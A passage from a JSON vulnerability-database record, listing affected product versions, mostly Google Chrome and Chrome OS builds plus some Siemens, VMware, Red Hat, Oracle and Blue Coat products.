        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.861.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.524.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.717.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.9"
      },
      {
        "model": "sql server r2 for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "200830"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.880.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.607.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.471.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.923.1"
      },
      {
        "model": "simatic ipc477d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.9"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.126"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.89"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.3.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.309.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.232"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.778.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.447.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.4.154.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.655.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.115"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.579.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1008"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.694.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.669.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1671.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.67"
      },
      {
        "model": "simatic s7-1500 software controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.702.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "47.0.2526.80"
      },
      {
        "model": "x-series xos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "11.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.190.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.400.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.31"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1.5"
      },
      {
        "model": "epicenter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.592.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.902.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.444.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.104"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1272.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.548.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1017.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.954.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.640.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.103"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.110"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.759.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.587.1"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.314.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.69"
      },
      {
        "model": "simatic ipc677d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.13"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.1.24"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.125"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1661.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.662.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.149"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.833.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.119"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1281.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.810.0"
      },
      {
        "model": "simotion p320-4e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.871.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.31"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364160"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1681.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.649.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.354.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.316.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.692.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.122"
      },
      {
        "model": "servers sw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x861.0"
      },
      {
        "model": "enterprise linux for power big endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.17"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.630.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.3.154.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.885.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.569.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.89"
      },
      {
        "model": "simatic itp3000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "v20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.962.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1675.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.306.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.295.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.123"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.318.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.619.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1004"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1033"
      },
      {
        "model": "simatic ipc627c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1044"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.160"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1679.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.23"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "60.0.3112.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.70"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.51"
      },
      {
        "model": "enterprise linux for scientific computing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.539.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.661.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.91"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.939.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.474.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.110"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.893.1"
      },
      {
        "model": "security analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.99"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.507.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.883.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.306"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.62"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.348.0"
      },
      {
